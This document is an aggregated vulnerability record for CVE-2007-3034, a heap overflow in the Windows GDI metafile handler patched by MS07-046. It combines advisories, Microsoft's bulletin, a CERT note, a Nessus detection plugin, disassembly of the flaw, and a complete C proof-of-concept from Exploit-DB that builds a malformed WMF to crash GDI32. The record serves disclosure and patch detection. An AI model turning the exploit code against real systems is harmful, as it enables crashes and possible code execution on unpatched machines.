ID CVE-2007-3034 Type cve Reporter cve@mitre.org Modified 2019-02-26T14:04:00
Description
Integer overflow in the AttemptWrite function in Graphics Rendering Engine (GDI) on Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted metafile (image) with a large record length value, which triggers a heap-based buffer overflow.
{"osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018563\n[Secunia Advisory ID:26423](https://secuniaresearch.flexerasoftware.com/advisories/26423/)\nOVAL ID: 2088\nNews Article: http://www.computerworld.com/action/article.do?command=viewArticleBasic&taxonomyName=security&articleId=9030696\nMicrosoft Security Bulletin: MS07-046\nMicrosoft Knowledge Base Article: 938829\nFrSIRT Advisory: ADV-2007-2870\n[CVE-2007-3034](https://vulners.com/cve/CVE-2007-3034)\nCERT VU: 640136\nBugtraq ID: 25302\n", "modified": "2007-08-14T15:52:01", "published": "2007-08-14T15:52:01", "href": "https://vulners.com/osvdb/OSVDB:36388", "id": "OSVDB:36388", "title": "Microsoft Windows Graphics Rendering Engine (GDI) Metafile Image Handling Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T22:04:58", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 25302\r\nCVE(CAN) ID: CVE-2007-3034\r\n\r\nMicrosoft Windows is a very popular operating system released by Microsoft.\r\n\r\n\r\nAn integer overflow can occur when the GDI32 function AttemptWrite in the Windows Graphics Device Interface (GDI) processes Windows metafiles; a remote attacker could exploit this vulnerability to elevate their privileges.\r\n\r\nAs the following disassembly shows, many GDI32 API functions call AttemptWrite, such as CreateMetaFileW.\r\n\r\n 77F4B519 mov esi, [ebp+0Ch] ; reported size of record in bytes\r\n ; (user-controlled)\r\n ...\r\n 77F4B548 mov eax, [ebx+0Ch] ; amount of buffer used in bytes\r\n ; (user-controlled)\r\n 77F4B548 lea ecx, [eax+esi] ; *** integer overflow ***\r\n 77F4B54E cmp ecx, [ebx+08h] ; buffer capacity\r\n 77F4B551 ja _no_memcpy\r\n ...\r\n 77F4B56D mov edi, [ebx] ; pointer to start of buffer\r\n 77F4B56F mov ecx, esi\r\n 77F4B574 add edi, eax ; now EDI points to unused buffer space\r\n ...\r\n 77F4B5BA mov eax, ecx\r\n 77F4B5BC shr ecx, 2\r\n 77F4B5BF rep movsd ; *** complete heap overwrite ***\r\n\r\nCreating a metafile that contains an oversized record length triggers the heap overflow, because memcpy then attempts to copy roughly 4GB of arbitrary data into the heap block. A copy of that size causes an access violation, but in programs that can handle such an exception it leads to execution of arbitrary instructions.\r\n\n\nMicrosoft Windows XP SP2\r\nMicrosoft Windows Server 2003 x64 Edition\r\nMicrosoft Windows Server 2003 SP1\r\nMicrosoft Windows 2000SP4\n Microsoft\r\n---------\r\nMicrosoft has released a security bulletin (MS07-046) and the corresponding patch for this issue:\r\nMS07-046: Vulnerability in GDI Could Allow Remote Code Execution (938829)\r\nLink: <a href=\"http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx?pf=true\" target=\"_blank\">http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx?pf=true</a>", "modified": "2007-08-17T00:00:00", "published": "2007-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-2122", "id": "SSV:2122", "type": "seebug", "title": "Microsoft Windows GDI AttemptWrite Function Remote Heap Overflow Vulnerability (MS07-046)", "sourceData": "", "sourceHref": "", "cvss": {"score": 9.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:26", "bulletinFamily": "software", "description": "Heap buffer overflow on Windows metafiles parsing.", "modified": "2007-08-14T00:00:00", "published": "2007-08-14T00:00:00", "id": "SECURITYVULNS:VULN:8043", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8043", "title": "Microsoft Windows GDI code execution", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:23", "bulletinFamily": "software", "description": "Microsoft Security Bulletin MS07-046 - Critical\r\nVulnerability in GDI Could Allow Remote Code Execution (938829)\r\nPublished: August 14, 2007\r\n\r\nVersion: 1.0\r\nGeneral Information\r\nExecutive Summary\r\n\r\nThis critical security update resolves a privately reported vulnerability. A remote code execution vulnerability exists in the Graphics Rendering Engine in the way that it handles specially crafted images. An attacker could exploit the vulnerability by constructing a specially crafted image that could potentially allow remote code execution if a user opened a specially crafted attachment in e-mail. An attacker who successfully exploited this vulnerability could take complete control of an affected system.\r\n\r\nThis is a critical security update for all supported editions of Windows except Windows 2003 Server Service Pack 2 and Windows Vista. For more information, see the subsection, Affected and Non-Affected Software, in this section.\r\n\r\nThis security update addresses the vulnerability by modifying the way that the Graphics Rendering Engine handles images. 
For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the specific vulnerability entry under the next section, Vulnerability Information.\r\n\r\nRecommendation: Microsoft recommends that customers apply the security update immediately.\r\n\r\nKnown Issues: None.\r\n\r\nAffected and Non-Affected Software\r\n\r\nThe software listed here has been tested to determine which versions or editions are affected. Other versions or editions are either past their support life cycle or are not affected. To determine the support life cycle for your software version or edition, visit Microsoft Support Lifecycle.\r\n\r\nAffected Software\r\nOperating System\tMaximum Security Impact\tAggregate Severity Rating\tBulletins Replaced by This Update\r\nMicrosoft Windows 2000 Service Pack 4\tRemote Code Execution\tCritical\tMS06-001\r\nWindows XP Service Pack 2\tRemote Code Execution\tCritical\tMS06-001\r\nWindows XP Professional x64 Edition\tRemote Code Execution\tCritical\tMS06-001\r\nWindows Server 2003 Service Pack 1\tRemote Code Execution\tCritical\tMS06-001\r\nWindows Server 2003 x64 Edition\tRemote Code Execution\tCritical\tMS06-001\r\nWindows Server 2003 with SP1 for Itanium-based Systems\tRemote Code Execution\tCritical\tMS06-001\r\n\r\nNon-Affected Software\r\nOperating System\r\nWindows XP Professional x64 Edition Service Pack 2\r\nWindows Server 2003 Service Pack 2\r\nWindows Server 2003 x64 Edition Service Pack 2\r\nWindows Server 2003 with SP2 for Itanium-based Systems\r\nWindows Vista\r\nWindows Vista x64 Edition\r\n\r\nFrequently Asked Questions (FAQ) Related to This Security Update\r\n\r\nI am using an 
older release of the software discussed in this security bulletin. What should I do? \r\nThe affected software listed in this bulletin have been tested to determine which releases are affected. Other releases are past their support life cycle. To determine the support life cycle for your software release, visit Microsoft Support Lifecycle.\r\n\r\nIt should be a priority for customers who have older releases of the software to migrate to supported releases to prevent potential exposure to vulnerabilities. For more information about the Windows Product Lifecycle, visit the following Microsoft Support Lifecycle. For more information about the extended security update support period for these software releases, visit the Microsoft Product Support Services Web site.\r\n\r\nCustomers who require custom support for older software must contact their Microsoft account team representative, their Technical Account Manager, or the appropriate Microsoft partner representative for custom support options. Customers without an Alliance, Premier, or Authorized Contract can contact their local Microsoft sales office. For contact information, visit the Microsoft Worldwide Information Web site, select the country, and then click Go to see a list of telephone numbers. When you call, ask to speak with the local Premier Support sales manager. 
For more information, see the Windows Operating System Product Support Lifecycle FAQ.\r\n\r\nVulnerability Information\r\n\r\nSeverity Ratings and Vulnerability Identifiers\r\nVulnerability Severity Rating and Maximum Security Impact by Affected Software\r\nAffected Software\tRemote Code Execution Vulnerability in GDI \u2013 CVE-2007-3034\tAggregate Severity Rating\r\nMicrosoft Windows 2000 Service Pack 4\tCritical / Remote Code Execution\tCritical\r\nWindows XP Service Pack 2\tCritical / Remote Code Execution\tCritical\r\nWindows XP Professional x64 Edition\tCritical / Remote Code Execution\tCritical\r\nWindows Server 2003 Service Pack 1\tCritical / Remote Code Execution\tCritical\r\nWindows Server 2003 x64 Edition\tCritical / Remote Code Execution\tCritical\r\nWindows Server 2003 with SP1 for Itanium-based Systems\tCritical / Remote Code Execution\tCritical\r\n\r\nRemote Code Execution Vulnerability in GDI \u2013 CVE-2007-3034\r\n\r\nA remote code execution vulnerability exists in the Graphics Rendering Engine because of the way that it handles specially crafted images. An attacker could exploit the vulnerability by constructing a specially crafted image that could potentially allow remote code execution if a user opened a specially crafted attachment in e-mail.\r\n\r\nAn attacker who successfully exploited this vulnerability could gain the same user rights as the local user. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nTo view this vulnerability as a standard entry in the Common Vulnerabilities and Exposures list, see CVE-2007-3034.\r\n\r\nMitigating Factors for Remote Code Execution Vulnerability in GDI \u2013 CVE-2007-3034\r\n\r\nMitigation refers to a setting, common configuration, or general best-practice, existing in a default state, that could reduce the severity of exploitation of a vulnerability. The following mitigating factors may be helpful in your situation:\r\n\u2022 An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\u2022 Microsoft Windows Vista and Windows Server 2003 Service Pack 2 are unaffected by this issue.\r\n\r\nWorkarounds for Remote Code Execution Vulnerability in GDI \u2013 CVE-2007-3034\r\n\r\nMicrosoft has not identified any workarounds for this vulnerability.\r\n\r\nFAQ for Remote Code Execution Vulnerability in GDI \u2013 CVE-2007-3034\r\n\r\nWhat is the scope of the vulnerability? \r\nThis is a remote code execution vulnerability. If a user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. 
Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\r\n\r\nWhat causes the vulnerability? \r\nThe vulnerability exists in the way that the Graphics Rendering Engine handles specially crafted images, potentially allowing arbitrary code to be executed.\r\n\r\nWhat might an attacker use the vulnerability to do? \r\nAn attacker who successfully exploited this vulnerability could run code on the affected system.\r\n\r\nHow could an attacker exploit the vulnerability? \r\nAn attacker could exploit this vulnerability by creating a specially crafted attachment in e-mail and then persuading the user to open the attachment. If the user opened the attachment, the attacker could cause arbitrary code to run in the security context of the locally logged-on user.\r\n\r\nWhat is GDI? \r\nMicrosoft Windows graphics device interface (GDI) enables applications to use graphics and formatted text on both the video display and the printer. Windows-based applications do not access the graphics hardware directly. Instead, GDI interacts with device drivers on behalf of applications. For more information on GDI, please visit the Windows GDI Start Page.\r\n\r\nWhat systems are primarily at risk from the vulnerability? \r\nWorkstations and terminal servers are primarily at risk.\r\n\r\nWhat does the update do? \r\nThe update removes the vulnerability by adding overflow validations to the handling of images.\r\n\r\nWhen this security bulletin was issued, had this vulnerability been publicly disclosed? \r\nNo. Microsoft received information about this vulnerability through responsible disclosure.\r\n\r\nWhen this security bulletin was issued, had Microsoft received any reports that this vulnerability was being exploited? \r\nNo. 
Microsoft had not received any information to indicate that this vulnerability had been publicly used to attack customers and had not seen any examples of proof of concept code published when this security bulletin was originally issued.\r\n\r\nOther Information\r\nAcknowledgments\r\n\r\nMicrosoft thanks the following for working with us to help protect customers:\r\n\u2022 eEye Digital Security for reporting the Remote Code Execution Vulnerability in GDI \u2013 CVE-2007-3034.\r\n\r\nSupport\r\n\u2022 Customers in the U.S. and Canada can receive technical support from Microsoft Product Support Services at 1-866-PCSAFETY. There is no charge for support calls that are associated with security updates.\r\n\u2022 International customers can receive support from their local Microsoft subsidiaries. There is no charge for support that is associated with security updates. For more information about how to contact Microsoft for support issues, visit the International Support Web site.\r\n\r\nDisclaimer\r\n\r\nThe information provided in the Microsoft Knowledge Base is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. 
Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\nRevisions\r\n\u2022 V1.0 (August 14, 2007): Bulletin published.", "modified": "2007-08-14T00:00:00", "published": "2007-08-14T00:00:00", "id": "SECURITYVULNS:DOC:17789", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17789", "title": "Microsoft Security Bulletin MS07-046 - Critical Vulnerability in GDI Could Allow Remote Code Execution (938829)", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T20:41:09", "bulletinFamily": "exploit", "description": "MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046). CVE-2007-3034. Dos exploit for windows platform", "modified": "2007-08-29T00:00:00", "published": "2007-08-29T00:00:00", "id": "EDB-ID:4337", "href": "https://www.exploit-db.com/exploits/4337/", "type": "exploitdb", "title": "Microsoft Windows - GDI32.DLL Denial of Service Exploit MS07-046", "sourceData": "/*\r\n * MS07-046(GDI32.dll Integer overflow DOS) Proof Of Concept Code\r\n \r\n * by Hong Gil-Dong & Chun Woo-Chi\r\n\r\n * Yang yeon(?~1542), Korea\r\n * \"I shall keep clenching my left fist unitl i see the real tao\".\r\n\r\n * This POC is only for test. If an application read a malformed wmf \r\n * file like this POC, the application will be crashed. If you apply \r\n * this code, you can execute an arbitrary code.\r\n *\r\n\r\n * We tested this code on Windows XP SP2 Korean Edition \r\n * (GDI32.dll version 5.1.2600.3099). 
But it will work well on other\r\n * systems.\r\n */\r\n\r\n#include <stdio.h>\r\n#include <windows.h>\r\n\r\n#define WMF_FILE \"ms07-046.wmf\"\r\n\r\nvoid usage(void);\r\n\r\nint main()\r\n{\r\n\t\r\n\tFILE *fp;\r\n\r\n\tchar wmf[] = \"\\x01\\x00\\x09\\x00\\x00\\x03\\x11\\x00\\x00\\x00\\x00\\x00\"\\\r\n \"\\x05\\x00\\x00\\x00\\x00\\x00\\xFF\\xFF\\xFF\\xFF\\x13\\x02\"\\\r\n \"\\x32\\x00\\x96\\x00\\x03\\x00\\x00\\x00\\x00\\x00\";\r\n\tint i;\r\n\t\r\n\tHMETAFILE srcMeta;\r\n\r\n usage();\r\n\r\n\tif ((fp = fopen(WMF_FILE, \"w\")) == NULL) {\r\n printf(\"File %s write error\\n\", WMF_FILE);\r\n return 0;\r\n\t}\r\n\r\n\tfor(i=0; i<sizeof(wmf)-1; i++)\r\n\t\tfputc(wmf[i], fp);\r\n\r\n\tfclose(fp);\r\n\r\n srcMeta = GetMetaFile(WMF_FILE);\r\n CopyMetaFile( srcMeta, NULL);\r\n\r\n return 0;\r\n}\r\n\r\nvoid usage(void) \r\n{\r\n printf(\"MS07-046 Windows Meta File RecordParms Integer Overflow \\n\");\r\n printf(\"Proof of Concept by Hong Gil-Dong & Chun Woo-Chi \\n\");\r\n \r\n}\r\n\r\n// milw0rm.com [2007-08-29]\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/4337/"}], "cert": [{"lastseen": "2019-10-09T19:50:48", "bulletinFamily": "info", "description": "### Overview \n\nMicrosoft Windows GDI contains an integer overflow in the handling of Windows metafiles, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nMicrosoft Windows [GDI](<http://msdn2.microsoft.com/en-us/library/ms536795.aspx>) (Graphics Device Interface) enables applications to use graphics and formatted text on both video displays and printers. GDI can be used to handle bitmaps, metafiles, and fonts. Microsoft Windows GDI contains an integer overflow vulnerability in the `AttemptWrite()` function. This integer overflow leads to a heap overflow. 
\n \n--- \n \n### Impact \n\nBy convincing a user to view a specially crafted metafile, a remote, unauthenticated attacker may be able to execute arbitrary code with the privileges of the user. \n \n--- \n \n### Solution \n\n**Apply an update**\n\nThis vulnerability is addressed by Microsoft Security Bulletin [MS07-046](<http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx>). This bulletin provides an updated version of GDI. \n \n--- \n \n### Vendor Information\n\n640136\n\n### Microsoft Corporation\n\nUpdated: August 14, 2007 \n\n### Status\n\nVulnerable\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThis vulnerability is addressed by Microsoft Security Bulletin [MS07-046](<http://www.microsoft.com/technet/security/Bulletin/MS07-046.mspx>). 
This bulletin provides an updated version of GDI.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23640136 Feedback>).\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n\n### References \n\n * <http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx>\n * <http://research.eeye.com/html/advisories/published/AD20070814b.html>\n * <http://msdn2.microsoft.com/en-us/library/ms536795.aspx>\n * <http://secunia.com/advisories/26423/>\n\n### Acknowledgements\n\nThanks to Microsoft for reporting this vulnerability, who in turn credit eEye Digital Security.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2007-3034](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-3034>) \n---|--- \n**Severity Metric:** | 27.34 \n**Date Public:** | 2007-08-14 \n**Date First Published:** | 2007-08-14 \n**Date Last Updated:** | 2007-08-14 20:58 UTC \n**Document Revision:** | 6 \n", "modified": "2007-08-14T20:58:00", "published": "2007-08-14T00:00:00", "id": "VU:640136", "href": "https://www.kb.cert.org/vuls/id/640136", "type": "cert", "title": "Microsoft GDI Windows Metafile AttemptWrite integer overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2019-11-03T12:15:44", "bulletinFamily": "scanner", "description": "The remote host contains a version of Microsoft Windows that has\nseveral vulnerabilities in the Graphic Rendering Engine and in the way\nWindows handles Metafiles.\n\nAn attacker may exploit these flaws to execute arbitrary code on the\nremote host. 
To exploit this flaw, an attacker would need to send a\nspecially crafted image to a user on the remote host, or lure him into\nvisiting a rogue website containing such a file.", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS07-046.NASL", "href": "https://www.tenable.com/plugins/nessus/25884", "published": "2007-08-14T00:00:00", "title": "MS07-046: Vulnerability in GDI Could Allow Remote Code Execution (938829)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25884);\n script_version(\"1.30\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2007-3034\");\n script_bugtraq_id(25302);\n script_xref(name:\"MSFT\", value:\"MS07-046\");\n script_xref(name:\"MSKB\", value:\"938829\");\n \n script_xref(name:\"CERT\", value:\"640136\");\n\n script_name(english:\"MS07-046: Vulnerability in GDI Could Allow Remote Code Execution (938829)\");\n script_summary(english:\"Determines the presence of update 938829\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host by sending a\nmalformed file to a victim.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a version of Microsoft Windows that has\nseveral vulnerabilities in the Graphic Rendering Engine and in the way\nWindows handles Metafiles.\n\nAn attacker may exploit these flaws to execute arbitrary code on the\nremote host. 
To exploit this flaw, an attacker would need to send a\nspecially crafted image to a user on the remote host, or lure him into\nvisiting a rogue website containing such a file.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2007/ms07-046\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 2000, XP, 2003 and\nVista.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(189);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/08/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/08/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(english:\"This script is Copyright (C) 2007-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 'Host/patch_management_checks');\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS07-046';\nkb = '938829';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) 
hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win2k:'4,5', xp:'2', win2003:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n hotfix_is_vulnerable(os:\"5.2\", sp:1, file:\"gdi32.dll\", version:\"5.2.3790.2960\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:2, file:\"gdi32.dll\", version:\"5.1.2600.3159\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.0\", file:\"gdi32.dll\", version:\"5.0.2195.7138\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}